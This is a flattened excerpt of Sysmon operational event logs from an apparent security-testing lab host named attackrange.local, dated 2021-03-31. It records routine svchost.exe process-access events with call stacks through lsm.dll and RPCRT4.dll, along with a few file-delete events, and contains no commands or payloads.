12:02:18.519{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005590Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.519{266CAFBE-64C6-6064-A900-00000000AE01}3404NT 
AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Windows\AppReadiness\S-1-5-21-4055678433-3894535204-3898404691-500MD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005589Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.488{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005588Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.488{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005587Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.488{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005586Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.488{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005585Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.488{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005584Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.488{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005583Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.488{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005582Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.457{266CAFBE-64C6-6064-A900-00000000AE01}34044568C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A700-00000000AE01}4388C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\appxdeploymentserver.dll+6468b|c:\windows\system32\appxdeploymentserver.dll+2d35e|c:\windows\system32\appxdeploymentserver.dll+2d19d|c:\windows\system32\appxdeploymentserver.dll+114d56|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005581Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.457{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x80000000000000005580Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.457{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005579Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.457{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Windows\AppReadiness\S-1-5-21-4055678433-3894535204-3898404691-500MD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005578Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.457{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=998E05597ECF7109CAFE378433D4EEBC,SHA256=1AD717702256588B52F3C0C83AB872C9CA4680921FC80C024105510CEB14BD57,IMPHASH=00000000000000000000000000000000falsetrue 
10341000x80000000000000005577Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.441{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005576Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.441{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x80000000000000005575Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.441{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005574Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.441{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x80000000000000005573Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.441{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005572Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.441{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005571Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.441{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005570Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.441{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005569Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.441{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005568Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.441{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005567Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.441{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005566Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.441{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 